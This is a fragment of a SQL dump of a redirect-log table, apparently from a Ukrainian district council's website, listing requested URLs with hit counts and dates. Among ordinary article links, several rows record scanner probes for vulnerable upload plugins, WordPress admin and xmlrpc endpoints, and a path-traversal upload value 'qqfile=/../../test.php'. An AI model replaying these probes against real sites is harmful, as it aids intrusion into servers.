00:00:00',301),(32958,'https://malyn-rayrada.gov.ua/index.php/1639-zvernennya-upravlinnya-sb-ukrajini-do-zhiteliv-ta-gostej-zhitomira-i-oblasti',NULL,'','',35,0,'2018-12-22 04:34:38','0000-00-00 00:00:00',301),(32959,'https://www.malyn-rayrada.gov.ua/index.php/1103-zvit-pro-vikoristannya-8000-0-grn-vidilenikh-25-02-2015-roku-rajonnij-radi-dlya-nadannya-materialnoji-doppomogi-uchasnikam-ato-ta-chlenam-jikh-simej',NULL,'','',23,0,'2018-12-22 04:34:39','0000-00-00 00:00:00',301),(32960,'https://www.malyn-rayrada.gov.ua/index.php/1293-pratsyue-elektronnij-servis-zamovlennya-vityagu-z-derzhavnogo-zemelnogo-kadastru-pro-zemelnu-dilyanku?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-12-22 04:35:28','0000-00-00 00:00:00',301),(32961,'https://www.malyn-rayrada.gov.ua/index.php/1293-pratsyue-elektronnij-servis-zamovlennya-vityagu-z-derzhavnogo-zemelnogo-kadastru-pro-zemelnu-dilyanku?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2018-12-22 04:35:33','0000-00-00 00:00:00',301),(32962,'https://www.malyn-rayrada.gov.ua/index.php/1350-zvernennya-spetsialistiv-veterinarnoji-meditsini-do-zhiteliv-m-malina-ta-malinskogo-rajonu',NULL,'','',28,0,'2018-12-22 04:35:50','0000-00-00 00:00:00',301),(32963,'https://www.malyn-rayrada.gov.ua/index.php/139-v-den-svjatogo-mikolaja-na-richci-irsha',NULL,'','',18,0,'2018-12-22 04:36:33','0000-00-00 00:00:00',301),(32964,'https://malyn-rayrada.gov.ua/index.php/1649-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-zhitomirskoji-oblasti-informue-4',NULL,'','',45,0,'2018-12-22 04:36:38','0000-00-00 00:00:00',301),(32965,'https://www.malyn-rayrada.gov.ua/index.php/1413-informatsiya-shchodo-nadannya-bezoplatnoji-vtorinnoji-pravovoji-dopomogi',NULL,'','',22,0,'2018-12-22 04:37:03','0000-00-00 00:00:00',301),(32966,'https://malyn-rayrada.gov.ua/index.php/1650-zakonodavchi-zmini-do-deyakikh-normativno-pravovikh-aktiv-u-sferi-zagalnoobov-yazkovogo-derzhavnogo-pensijnogo-strakhuvannya-z-1-sichnya-2017-roku',NULL,'','',33,0,'2018-12-22 04:37:06','0000-00-00 00:00:00',301),(32967,'https://www.malyn-rayrada.gov.ua/index.php/1415-na-terenakh-rajonu-novij-veb-sajt-istoriya-malina?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2018-12-22 04:37:16','0000-00-00 00:00:00',301),(32968,'https://www.malyn-rayrada.gov.ua/index.php/1509-sergij-dinyak-ya-printsipovij-prikhilnik-reform?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-12-22 04:37:51','0000-00-00 00:00:00',301),(32969,'https://www.malyn-rayrada.gov.ua/index.php/183-selu-ivanivka-210-rokiv?tmpl=component&print=1&layout=default',NULL,'','',2,0,'2018-12-22 04:38:52','0000-00-00 00:00:00',301),(32970,'https://www.malyn-rayrada.gov.ua/index.php/304-foto-video-reportazh-iz-vorsivki-7-travnja?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-12-22 04:39:28','0000-00-00 00:00:00',301),(32971,'https://www.malyn-rayrada.gov.ua/index.php/410-ostannij-osinnij-ranok?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-12-22 04:39:33','0000-00-00 00:00:00',301),(32972,'https://www.malyn-rayrada.gov.ua/index.php/1522-pryama-liniya-pro-spravi-pensijni',NULL,'','',25,0,'2018-12-22 07:30:33','0000-00-00 00:00:00',301),(32973,'https://malyn-rayrada.gov.ua/index.php/1149-svyatkuvannya-dnya-sela-u-barvinkakh',NULL,'','',35,0,'2018-12-22 11:04:01','0000-00-00 00:00:00',301),(32974,'https://malyn-rayrada.gov.ua/index.php/2061-do-vidoma-deputativ-rajonnoji-radi-2',NULL,'','',7,0,'2018-12-22 12:25:25','0000-00-00 00:00:00',301),(32975,'https://www.malyn-rayrada.gov.ua/index.php/1521-sektor-organizatsijnoji-roboti-malinskoji-odpi-informue-2',NULL,'','',25,0,'2018-12-22 13:37:06','0000-00-00 00:00:00',301),(32976,'https://www.malyn-rayrada.gov.ua/index.php/1703-vryatuj-sertse-yani',NULL,'','',24,0,'2018-12-22 19:44:37','0000-00-00 00:00:00',301),(32977,'https://malyn-rayrada.gov.ua/index.php/1545-vshanuvali-lyudej-pokhilogo-viku',NULL,'','',35,0,'2018-12-22 22:58:10','0000-00-00 00:00:00',301),(32978,'https://malyn-rayrada.gov.ua/index.php/1464-rozpochato-viplatu-pensij-za-cherven',NULL,'','',4,0,'2018-12-22 23:39:58','0000-00-00 00:00:00',301),(32979,'https://www.malyn-rayrada.gov.ua/index.php/1040-do-uvagi-zhiteliv-malinskogo-rajonu',NULL,'','',1,0,'2018-12-23 00:46:10','0000-00-00 00:00:00',301),(32980,'https://www.malyn-rayrada.gov.ua/index.php/2061-do-vidoma-deputativ-rajonnoji-radi-2',NULL,'','',5,0,'2018-12-23 00:49:48','0000-00-00 00:00:00',301),(32981,'https://www.malyn-rayrada.gov.ua/index.php/85-primhi-prirodi-16-20-god-19-07-2011-roku',NULL,'','',13,0,'2018-12-23 01:32:12','0000-00-00 00:00:00',301),(32982,'https://www.malyn-rayrada.gov.ua/index.php/1705-natsionalnij-bank-ukrajini-povidomlyae',NULL,'','',24,0,'2018-12-23 01:33:36','0000-00-00 00:00:00',301),(32983,'https://malyn-rayrada.gov.ua/index.php/1509-sergij-dinyak-ya-printsipovij-prikhilnik-reform',NULL,'','',33,0,'2018-12-23 02:00:40','0000-00-00 00:00:00',301),(32984,'https://malyn-rayrada.gov.ua/index.php/1894-pro-sklikannya-22-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',5,0,'2018-12-23 02:48:25','0000-00-00 00:00:00',301),(32985,'https://malyn-rayrada.gov.ua/index.php/1521-sektor-organizatsijnoji-roboti-malinskoji-odpi-informue-2',NULL,'','',39,0,'2018-12-23 03:07:03','0000-00-00 00:00:00',301),(32986,'https://malyn-rayrada.gov.ua/index.php/1494-pilotnij-proekt-u-sferi-reestratsiji-gromadskikh-formuvan',NULL,'','',27,0,'2018-12-23 06:54:16','0000-00-00 00:00:00',301),(32987,'https://malyn-rayrada.gov.ua/attachments/article/2144/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ñ‚ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',2,0,'2018-12-23 07:12:53','0000-00-00 00:00:00',301),(32988,'https://www.malyn-rayrada.gov.ua/index.php/1547-kartoplyu-dlya-chopovitskogo-statsionarnogo-viddilennya-zagotovleno',NULL,'','',26,0,'2018-12-23 09:33:35','0000-00-00 00:00:00',301),(32989,'https://malyn-rayrada.gov.ua/index.php/1463-do-uvagi-vnutrishno-peremishchenikh-osib',NULL,'','',24,0,'2018-12-23 09:51:55','0000-00-00 00:00:00',301),(32990,'https://www.malyn-rayrada.gov.ua/index.php/1682-ogoloshennya-pro-formuvannya-spisku-prisyazhnikh-malinskogo-rajonnogo-sudu',NULL,'','',27,0,'2018-12-23 10:08:13','0000-00-00 00:00:00',301),(32991,'https://malyn-rayrada.gov.ua/index.php/1182-videozvit-pro-serpnevu-konferentsiyu-osvityan-rajonu',NULL,'','',26,0,'2018-12-23 10:51:25','0000-00-00 00:00:00',301),(32992,'https://malyn-rayrada.gov.ua/index.php/1566-viddil-kulturi-malinskoji-rajderzhadministratsiji-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu',NULL,'','',23,0,'2018-12-23 21:06:20','0000-00-00 00:00:00',301),(32993,'https://malyn-rayrada.gov.ua/index.php/1415-na-terenakh-rajonu-novij-veb-sajt-istoriya-malina',NULL,'','',38,0,'2018-12-24 01:21:16','0000-00-00 00:00:00',301),(32994,'https://www.malyn-rayrada.gov.ua/dev/wp-admin/',NULL,'','',1,0,'2018-12-24 02:33:55','0000-00-00 00:00:00',301),(32995,'https://malyn-rayrada.gov.ua/index.php/1103-zvit-pro-vikoristannya-8000-0-grn-vidilenikh-25-02-2015-roku-rajonnij-radi-dlya-nadannya-materialnoji-doppomogi-uchasnikam-ato-ta-chlenam-jikh-simej',NULL,'','',38,0,'2018-12-24 19:37:27','0000-00-00 00:00:00',301),(32996,'https://malyn-rayrada.gov.ua/index.php/1704-malinska-ob-ednanna-derzhavna-podatkova-inspektsiya-pro-osoblivosti-deklaratsijnoji-kampaniji',NULL,'','',31,0,'2018-12-24 19:40:57','0000-00-00 00:00:00',301),(32997,'https://www.malyn-rayrada.gov.ua/index.php/923-fotoreportazh-iz-mitingu-bilya-pam-yatnogo-znaku-nebesnij-sotni-z-nagodi-dnya-gidnosti-ta-svobodi',NULL,'','',21,0,'2018-12-24 20:08:58','0000-00-00 00:00:00',301),(32998,'https://malyn-rayrada.gov.ua/index.php/1124-den-skorboti-i-vshanuvannya-pam-yati-zhertv-vijni-v-ukrajini',NULL,'','',31,0,'2018-12-24 20:12:21','0000-00-00 00:00:00',301),(32999,'https://www.malyn-rayrada.gov.ua/index.php/1293-pratsyue-elektronnij-servis-zamovlennya-vityagu-z-derzhavnogo-zemelnogo-kadastru-pro-zemelnu-dilyanku',NULL,'','',23,0,'2018-12-24 22:23:25','0000-00-00 00:00:00',301),(33000,'https://malyn-rayrada.gov.ua/index.php/1554-proekt-strategiji-podolannya-naslidkiv-chornobilskoji-katastrofi-ta-vidrodzhennya-teritorij-shcho-zaznali-radioaktivnogo-zabrudnennya',NULL,'','',32,0,'2018-12-25 04:45:46','0000-00-00 00:00:00',301),(33001,'https://malyn-rayrada.gov.ua/index.php/1698-proponuemo-nayavne-vilne-nerukhome-majno-shcho-perebuvae-u-spilnij-vlasnosti-teritorialnikh-gromad-sil-selishch-malinskogo-rajonu-yake-na-danij-chas-ne-vikoristovuetsya-ta-mozhe-buti-nadano-v-orendu',NULL,'','',16,0,'2018-12-25 04:48:07','0000-00-00 00:00:00',301),(33002,'https://malyn-rayrada.gov.ua/index.php/1703-vryatuj-sertse-yani?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2018-12-25 04:48:29','0000-00-00 00:00:00',301),(33003,'https://www.malyn-rayrada.gov.ua/index.php/1029-pro-skasuvannya-zoni-radiologichnogo-kontrolyu-ta-pilgove-zabezpechennya',NULL,'','',13,0,'2018-12-25 04:59:01','0000-00-00 00:00:00',301),(33004,'https://www.malyn-rayrada.gov.ua/index.php/1068-pro-formuvannya-spisku-narodnikh-zasidateliv',NULL,'','',16,0,'2018-12-25 05:10:32','0000-00-00 00:00:00',301),(33005,'https://malyn-rayrada.gov.ua/index.php/1912-pro-sklikannya-22-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',9,0,'2018-12-25 06:47:07','0000-00-00 00:00:00',301),(33006,'https://malyn-rayrada.gov.ua/index.php/1547-kartoplyu-dlya-chopovitskogo-statsionarnogo-viddilennya-zagotovleno',NULL,'','',35,0,'2018-12-25 06:47:15','0000-00-00 00:00:00',301),(33007,'https://www.malyn-rayrada.gov.ua/index.php/1980-shche-raz-pro-pererakhunki-pensijnikh-viplat-vijskovosluzhbovtsiv',NULL,'','',5,0,'2018-12-25 06:52:36','0000-00-00 00:00:00',301),(33008,'https://www.malyn-rayrada.gov.ua/index.php/1693-pro-sklikannya-16-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',1,0,'2018-12-25 06:57:50','0000-00-00 00:00:00',301),(33009,'https://www.malyn-rayrada.gov.ua/index.php/1580-pro-sklikannya-12-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',1,0,'2018-12-25 06:57:50','0000-00-00 00:00:00',301),(33010,'https://malyn-rayrada.gov.ua/index.php/1634-pro-sklikannya-drugogo-plenarnogo-zasidannya-14-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',3,0,'2018-12-25 07:48:39','0000-00-00 00:00:00',301),(33011,'https://malyn-rayrada.gov.ua/index.php/1036-do-vidoma-zhiteliv-telefonni-garyachi-liniji-tsentralnikh-organiv-vikonavchoji-vladi',NULL,'','',18,0,'2018-12-25 08:07:01','0000-00-00 00:00:00',301),(33012,'https://malyn-rayrada.gov.ua/index.php/1350-zvernennya-spetsialistiv-veterinarnoji-meditsini-do-zhiteliv-m-malina-ta-malinskogo-rajonu',NULL,'','',49,0,'2018-12-25 08:41:44','0000-00-00 00:00:00',301),(33013,'https://malyn-rayrada.gov.ua/index.php/1293-pratsyue-elektronnij-servis-zamovlennya-vityagu-z-derzhavnogo-zemelnogo-kadastru-pro-zemelnu-dilyanku',NULL,'','',22,0,'2018-12-25 09:11:40','0000-00-00 00:00:00',301),(33014,'https://malyn-rayrada.gov.ua/index.php/1475-upravlinnya-derzhprodspozhivsluzhbi-v-malinskomu-rajoni-prosit-dotrimuvatis-prostikh-sanitarno-gigienichnikh-pravil',NULL,'','',23,0,'2018-12-25 09:32:04','0000-00-00 00:00:00',301),(33015,'https://malyn-rayrada.gov.ua/index.php/1454-v-upravlinni-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-zhitomirskoji-oblasti-provedeno-zakhid-pensijnij-vseobuch',NULL,'','',29,0,'2018-12-25 09:43:38','0000-00-00 00:00:00',301),(33016,'https://www.malyn-rayrada.gov.ua/index.php/1182-videozvit-pro-serpnevu-konferentsiyu-osvityan-rajonu',NULL,'','',16,0,'2018-12-25 12:38:56','0000-00-00 00:00:00',301),(33017,'https://malyn-rayrada.gov.ua/index.php/2024-p-l-a-n-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-24-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',7,0,'2018-12-25 12:59:15','0000-00-00 00:00:00',301),(33018,'https://malyn-rayrada.gov.ua/index.php/1682-ogoloshennya-pro-formuvannya-spisku-prisyazhnikh-malinskogo-rajonnogo-sudu',NULL,'','',59,0,'2018-12-25 15:45:58','0000-00-00 00:00:00',301),(33019,'https://www.malyn-rayrada.gov.ua/index.php/1649-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-zhitomirskoji-oblasti-informue-4',NULL,'','',25,0,'2018-12-25 18:12:32','0000-00-00 00:00:00',301),(33020,'https://malyn-rayrada.gov.ua/index.php/1176-sogodni-pravoslavni-svyatkuyut-uspinnya-presvyatoji-bogoroditsi',NULL,'','',65,0,'2018-12-25 19:28:49','0000-00-00 00:00:00',301),(33021,'https://www.malyn-rayrada.gov.ua/index.php/1348-vijskova-sluzhba-za-kontraktom',NULL,'','',14,0,'2018-12-26 20:59:46','0000-00-00 00:00:00',301),(33022,'https://www.malyn-rayrada.gov.ua/index.php/947-fotoreportazh-iz-urochistikh-zboriv-do-dnya-mistsevogo-samovryaduvannya',NULL,'','',16,0,'2018-12-26 22:50:54','0000-00-00 00:00:00',301),(33023,'https://www.malyn-rayrada.gov.ua/index.php/1158-na-poryadku-dennomu-pitannya-nadannya-gromadyanam-yakisnikh-poslug',NULL,'','',24,0,'2018-12-26 23:43:51','0000-00-00 00:00:00',301),(33024,'https://www.malyn-rayrada.gov.ua/index.php/1415-na-terenakh-rajonu-novij-veb-sajt-istoriya-malina',NULL,'','',18,0,'2018-12-27 01:35:48','0000-00-00 00:00:00',301),(33025,'https://malyn-rayrada.gov.ua/index.php/139-v-den-svjatogo-mikolaja-na-richci-irsha',NULL,'','',33,0,'2018-12-27 04:18:27','0000-00-00 00:00:00',301),(33026,'https://www.malyn-rayrada.gov.ua/index.php/1149-svyatkuvannya-dnya-sela-u-barvinkakh?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-12-27 09:08:22','0000-00-00 00:00:00',301),(33027,'https://www.malyn-rayrada.gov.ua/index.php/1036-do-vidoma-zhiteliv-telefonni-garyachi-liniji-tsentralnikh-organiv-vikonavchoji-vladi',NULL,'','',15,0,'2018-12-27 11:58:01','0000-00-00 00:00:00',301),(33028,'https://www.malyn-rayrada.gov.ua/index.php/1397-obgovorennya-situatsiji-iz-spozhivachami-prirodnogo-gazu',NULL,'','',11,0,'2018-12-27 20:14:02','0000-00-00 00:00:00',301),(33029,'https://www.malyn-rayrada.gov.ua/index.php/1565-komunalne-pidpriemstvo-akhplan-malinskoji-rajonnoji-radi-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu',NULL,'','',1,0,'2018-12-27 21:11:23','0000-00-00 00:00:00',301),(33030,'https://www.malyn-rayrada.gov.ua/old/wp-admin/',NULL,'','',1,0,'2018-12-27 23:39:24','0000-00-00 00:00:00',301),(33031,'https://www.malyn-rayrada.gov.ua/index.php/1219-z-pochatku-2015-roku-na-potrebi-ukrajinskoji-armiji-vid-platnikiv-malinshchini-nadijshlo-majzhe-4-9-mln-grn-vijskovogo-zboru',NULL,'','',19,0,'2018-12-28 00:09:49','0000-00-00 00:00:00',301),(33032,'https://www.malyn-rayrada.gov.ua/wp-content/plugins/reflex-gallery/admin/scripts/fileuploader/php.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php','',1,0,'2018-12-28 02:18:25','0000-00-00 00:00:00',301),(33033,'https://malyn-rayrada.gov.ua/index.php/1042-moe-ridne-selo-gorin',NULL,'','',29,0,'2018-12-28 07:47:34','0000-00-00 00:00:00',301),(33034,'https://www.malyn-rayrada.gov.ua/index.php/1128-fotoreportazh-iz-svyatkuvannya-dnya-molodi-v-seli-pirizhki',NULL,'','',11,0,'2018-12-28 17:16:37','0000-00-00 00:00:00',301),(33035,'https://www.malyn-rayrada.gov.ua//xmlrpc.php',NULL,'http://www.google.com.hk','',2,0,'2018-12-28 23:13:06','0000-00-00 00:00:00',301),(33036,'https://malyn-rayrada.gov.ua/plugins/content/apismtp/apismtp.php?test=hello',NULL,'https://malyn-rayrada.gov.ua/plugins/content/apismtp/apismtp.php?test=hello','',6,0,'2018-12-28 23:14:24','0000-00-00 00:00:00',301),(33037,'https://www.malyn-rayrada.gov.ua/index.php/1453-seminar-po-detsentralizatsiji',NULL,'','',10,0,'2018-12-29 00:15:40','0000-00-00 00:00:00',301),(33038,'https://www.malyn-rayrada.gov.ua/index.php/1454-v-upravlinni-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-zhitomirskoji-oblasti-provedeno-zakhid-pensijnij-vseobuch',NULL,'','',17,0,'2018-12-29 00:15:48','0000-00-00 00:00:00',301),(33039,'https://www.malyn-rayrada.gov.ua/index.php/1475-upravlinnya-derzhprodspozhivsluzhbi-v-malinskomu-rajoni-prosit-dotrimuvatis-prostikh-sanitarno-gigienichnikh-pravil',NULL,'','',14,0,'2018-12-29 00:19:26','0000-00-00 00:00:00',301),(33040,'https://www.malyn-rayrada.gov.ua/index.php/1509-sergij-dinyak-ya-printsipovij-prikhilnik-reform',NULL,'','',20,0,'2018-12-29 00:23:01','0000-00-00 00:00:00',301),(33041,'https://www.malyn-rayrada.gov.ua/index.php/1512-poryadok-ta-umovi-vzyattya-pereselentsiv-na-oblik',NULL,'','',21,0,'2018-12-29 00:23:59','0000-00-00 00:00:00',301),(33042,'https://www.malyn-rayrada.gov.ua/index.php/1519-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-zhitomirskoji-oblasti-informue-2',NULL,'','',27,0,'2018-12-29 00:26:57','0000-00-00 00:00:00',301),(33043,'https://www.malyn-rayrada.gov.ua/index.php/1704-malinska-ob-ednanna-derzhavna-podatkova-inspektsiya-pro-osoblivosti-deklaratsijnoji-kampaniji',NULL,'','',23,0,'2018-12-29 00:43:24','0000-00-00 00:00:00',301),(33044,'https://www.malyn-rayrada.gov.ua/index.php/1017-20-lyutogo-den-gerojiv-nebesnoji-sotni',NULL,'','',7,0,'2018-12-29 21:27:50','0000-00-00 00:00:00',301),(33045,'https://www.malyn-rayrada.gov.ua/index.php/992-22-sichnya-den-sobornosti-ukrajini?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-12-29 23:50:31','0000-00-00 00:00:00',301),(33046,'https://www.malyn-rayrada.gov.ua/index.php/2142-vidbulas-27-sesiya-malinskoji-rajonnoji-radi',NULL,'','',4,0,'2018-12-30 03:02:09','0000-00-00 00:00:00',301),(33047,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2136-pro-rajonnij-byudzhet-na-2019-rik',NULL,'','',13,0,'2018-12-30 08:41:40','0000-00-00 00:00:00',301),(33048,'https://www.malyn-rayrada.gov.ua/index.php/1273-7-grudnya-deen-mistsevogo-samovryaduvannya',NULL,'','',9,0,'2018-12-30 15:21:15','0000-00-00 00:00:00',301),(33049,'https://www.malyn-rayrada.gov.ua/index.php/1175-vitaemo-iz-dnem-nezalezhnosti',NULL,'','',15,0,'2018-12-30 17:17:06','0000-00-00 00:00:00',301),(33050,'https://malyn-rayrada.gov.ua/index.php/1486-deputati-malinskoji-miskoji-radi-odnogolosno-initsiyuvali-dobrovilne-ob-ednannya-malina-i-rajonu',NULL,'','',112,0,'2018-12-30 18:15:26','0000-00-00 00:00:00',301),(33051,'https://www.malyn-rayrada.gov.ua/index.php/1139-obgovoreno-shlyakhi-pokrashchennya-spivpratsi-z-uchasnikami-ato?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-12-30 18:21:10','0000-00-00 00:00:00',301),(33052,'https://www.malyn-rayrada.gov.ua/index.php/916-svyatkovij-fleshmob-v-malinivtsi',NULL,'','',18,0,'2018-12-31 05:14:26','0000-00-00 00:00:00',301),(33053,'https://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/2010-06-06-03-57-58/2153-sh',NULL,'','',5,0,'2018-12-31 14:33:37','0000-00-00 00:00:00',301),(33054,'https://malyn-rayrada.gov.ua/index.php/1703-vryatuj-sertse-yani',NULL,'http://malyn-rayrada.gov.ua/index.php/1703-vryatuj-sertse-yani','',46,0,'2018-12-31 18:00:09','0000-00-00 00:00:00',301),(33055,'https://www.malyn-rayrada.gov.ua/index.php/1026-nagriemos?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-12-31 19:07:21','0000-00-00 00:00:00',301),(33056,'https://www.malyn-rayrada.gov.ua/index.php/1026-nagriemos',NULL,'','',14,0,'2019-01-01 04:28:35','0000-00-00 00:00:00',301),(33057,'https://www.malyn-rayrada.gov.ua/index.php/1003-ogoloshennya-fomuvannya-spisku-prisyazhnikh',NULL,'','',11,0,'2019-01-01 07:33:07','0000-00-00 00:00:00',301),(33058,'https://www.malyn-rayrada.gov.ua/index.php/410-ostannij-osinnij-ranok',NULL,'','',15,0,'2019-01-01 10:04:38','0000-00-00 00:00:00',301),(33059,'https://www.malyn-rayrada.gov.ua/index.php/1149-svyatkuvannya-dnya-sela-u-barvinkakh',NULL,'','',15,0,'2019-01-01 11:40:59','0000-00-00 00:00:00',301),(33060,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1620-pro-rajonnij-byudzhet-na-2017-rik',NULL,'','',5,0,'2019-01-01 15:05:05','0000-00-00 00:00:00',301),(33061,'https://malyn-rayrada.gov.ua/index.php/1175-vitaemo-iz-dnem-nezalezhnosti',NULL,'','',21,0,'2019-01-02 07:23:10','0000-00-00 00:00:00',301),(33062,'https://malyn-rayrada.gov.ua/readme.html',NULL,'','',1,0,'2019-01-02 18:44:07','0000-00-00 00:00:00',301),(33063,'https://malyn-rayrada.gov.ua/xmlrpc.php',NULL,'','',6,0,'2019-01-02 19:29:11','0000-00-00 00:00:00',301),(33064,'https://www.malyn-rayrada.gov.ua/wp-content/plugins/photo-gallery/filemanager/uploadhandler.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php','',1,0,'2019-01-03 17:46:20','0000-00-00 00:00:00',301),(33065,'https://www.malyn-rayrada.gov.ua/wp-content/plugins/formcraft/file-upload/server/php/upload.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/formcraft/file-upload/server/php/upload.php','',1,0,'2019-01-04 06:19:07','0000-00-00 00:00:00',301),(33066,'https://malyn-rayrada.gov.ua/attachments/article/1583/ðÿñ–ð´ññƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ññƒð²ð°ð½ð½ñ 12 ð¿ð¾ð·ð°ñ‡ðµñ€ð³ð¾ð²ð° ñðµññ–ñ7.pdf',NULL,'','',3,0,'2019-01-04 12:29:17','0000-00-00 00:00:00',301),(33067,'https://malyn-rayrada.gov.ua/assets/global/plugins/jquery-file-upload/server/php/index.php/assets/global/plugins/jquery-file-upload/server/php/index.php',NULL,'','',1,0,'2019-01-04 15:52:15','0000-00-00 00:00:00',301),(33068,'https://malyn-rayrada.gov.ua/assets/plugins/jquery-file-upload/server/php/index.php/assets/plugins/jquery-file-upload/server/php/index.php',NULL,'','',1,0,'2019-01-04 15:52:17','0000-00-00 00:00:00',301),(33069,'https://malyn-rayrada.gov.ua/assets/jquery-file-upload/server/php/index.php/assets/jquery-file-upload/server/php/index.php',NULL,'','',1,0,'2019-01-04 15:52:19','0000-00-00 00:00:00',301),(33070,'https://malyn-rayrada.gov.ua/phpformbuilder/plugins/jquery-file-upload/server/php/index.php/phpformbuilder/plugins/jquery-file-upload/server/php/index.php',NULL,'','',1,0,'2019-01-04 15:52:21','0000-00-00 00:00:00',301),(33071,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/2010-06-06-03-57-58/2153-sh',NULL,'','',6,0,'2019-01-04 18:57:26','0000-00-00 00:00:00',301),(33072,'https://malyn-rayrada.gov.ua/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../test.php',NULL,'https://malyn-rayrada.gov.ua/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../test.php','',1,0,'2019-01-04 23:32:27','0000-00-00 00:00:00',301),(33073,'https://malyn-rayrada.gov.ua/index.php?option=com_virtuemart&page=shop.registration',NULL,'','',1,0,'2019-01-04 23:37:26','0000-00-00 00:00:00',301),(33074,'https://malyn-rayrada.gov.ua/index.php/1522-pryama-liniya-pro-spravi-pensijni',NULL,'','',48,0,'2019-01-05 16:58:19','0000-00-00 00:00:00',301),(33075,'https://malyn-rayrada.gov.ua/index.php/1017-20-lyutogo-den-gerojiv-nebesnoji-sotni',NULL,'','',21,0,'2019-01-06 00:17:56','0000-00-00 00:00:00',301),(33076,'https://malyn-rayrada.gov.ua/attachments/article/2040/ð›ñƒðºñ–ð²ññœðºñ–ð¹ ññ–ð»ñœññœðºñ–ð¹ ñ€ð°ð´ñ– 95compressed.pdf',NULL,'','',2,0,'2019-01-06 07:04:47','0000-00-00 00:00:00',301),(33077,'https://malyn-rayrada.gov.ua/images/stories/9214127',NULL,'','',3,0,'2019-01-06 07:16:39','0000-00-00 00:00:00',301),(33078,'https://malyn-rayrada.gov.ua/images/stories/92',NULL,'','',1,0,'2019-01-06 07:16:40','0000-00-00 00:00:00',301),(33079,'https://malyn-rayrada.gov.ua/images/stories/921',NULL,'','',2,0,'2019-01-06 07:16:40','0000-00-00 00:00:00',301),(33080,'https://malyn-rayrada.gov.ua/images/stories/9214',NULL,'','',1,0,'2019-01-06 07:16:40','0000-00-00 00:00:00',301),(33081,'https://malyn-rayrada.gov.ua/imag',NULL,'','',2,0,'2019-01-06 07:16:40','0000-00-00 00:00:00',301),(33082,'https://malyn-rayrada.gov.ua/image',NULL,'','',1,0,'2019-01-06 07:16:42','0000-00-00 00:00:00',301),(33083,'https://malyn-rayrada.gov.ua/images/stories/9',NULL,'','',1,0,'2019-01-06 07:16:42','0000-00-00 00:00:00',301),(33084,'https://malyn-rayrada.gov.ua/i',NULL,'','',2,0,'2019-01-06 07:16:42','0000-00-00 00:00:00',301),(33085,'https://malyn-rayrada.gov.ua/images/s',NULL,'','',1,0,'2019-01-06 07:16:43','0000-00-00 00:00:00',301),(33086,'https://malyn-rayrada.gov.ua/images/stories/921412',NULL,'','',2,0,'2019-01-06 07:16:43','0000-00-00 00:00:00',301),(33087,'https://malyn-rayrada.gov.ua/images/storie',NULL,'','',1,0,'2019-01-06 07:16:43','0000-00-00 00:00:00',301),(33088,'https://malyn-rayrada.gov.ua/images/st',NULL,'','',1,0,'2019-01-06 07:16:44','0000-00-00 00:00:00',301),(33089,'https://malyn-rayrada.gov.ua/images/stories/921412741',NULL,'','',1,0,'2019-01-06 07:16:44','0000-00-00 00:00:00',301),(33090,'https://malyn-rayrada.gov.ua/images/stori',NULL,'','',2,0,'2019-01-06 07:16:44','0000-00-00 00:00:00',301),(33091,'https://malyn-rayrada.gov.ua/images/stories/92141',NULL,'','',1,0,'2019-01-06 07:16:44','0000-00-00 00:00:00',301),(33092,'https://malyn-rayrada.gov.ua/im',NULL,'','',2,0,'2019-01-06 07:16:45','0000-00-00 00:00:00',301),(33093,'https://malyn-rayrada.gov.ua/index.php?option=com_user&view=register',NULL,'','',1,0,'2019-01-07 09:05:02','0000-00-00 00:00:00',301),(33094,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1790-pro-vnesennya-zmin-do-rajonnoji-programi-teritorialna-oborona-na-2017-2020-roki',NULL,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1790-pro-vnesennya-zmin-do-rajonnoji-programi-teritorialna-oborona-na-2017-2020-roki','',42,0,'2019-01-07 